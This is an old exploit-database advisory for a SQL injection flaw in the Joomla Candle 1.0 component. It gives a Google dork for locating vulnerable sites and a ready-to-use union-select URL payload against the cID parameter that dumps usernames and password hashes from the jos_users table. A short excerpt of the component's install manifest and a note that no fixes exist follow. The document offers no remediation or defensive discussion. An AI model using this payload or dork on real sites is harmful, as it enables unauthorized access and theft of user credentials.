Joomla Component Candle 1.0 (cID) SQL Injection Vulnerability

2008-03-08 00:00:00

#############################################
#
########### JOOMLA com_candle SQL Injection(cid)
#
#############################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
####
####MAiL : [email protected]
#
#############################################
#
##DORK 1 : allinurl:"com_candle"
#
#############################################
EXPLOIT :

index.php?option=com_candle&task=content&cID=-9999/**/union/**/select/**/0x3a,username,0x3a,password,0x3a,0x3a/**/from/**/jos_users/*

#############################################
################# S@BUN ####################
#############################################
######## [email protected] ######
#############################################

<mosinstall type="component" version="1.0.0">
<name>Candle</name>
<author>Son Vu</author>
<creationDate>March 2007</creationDate>
<copyright>(C) 2007 Open Source Matters. All rights reserved.</copyright>
<license>http://www.gnu.org/copyleft/gpl.html GNU/GPL</license>

<authorEmail>[email protected]</authorEmail>
<authorUrl></authorUrl>
<version>1.0.0</version>
<description>Candle Component.</description>

#

Fixes

No fixes

In order to submit a new fix you need to be registered.